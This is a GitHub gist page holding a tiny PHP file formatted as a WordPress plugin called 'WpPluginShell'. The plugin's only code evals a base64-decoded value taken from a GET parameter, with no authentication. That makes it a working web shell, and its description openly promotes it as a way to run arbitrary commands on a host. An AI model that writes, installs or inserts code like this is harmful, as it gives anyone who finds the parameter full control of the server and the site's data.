Created
February 25, 2013 13:53
-
-
Save Phaeilo/5029921 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Plugin Name: WpPluginShell | |
* Plugin URI: http://example.org | |
* Description: This plugin allows arbitrary command execution, lol. Useful if you have a crazy hosting company which randomly disables shell access. There is no authentication, so don't leave this plugin active/installed any longer than necessary. | |
* Version: 1.33.7 | |
* Author: Philip | |
* Author URI: http://example.org | |
* License: WTFPL | |
* License URI: http://www.wtfpl.net/ | |
*/ | |
if(isset($_GET['wppluginshell'])) { | |
eval(base64_decode($_GET['wppluginshell'])); | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment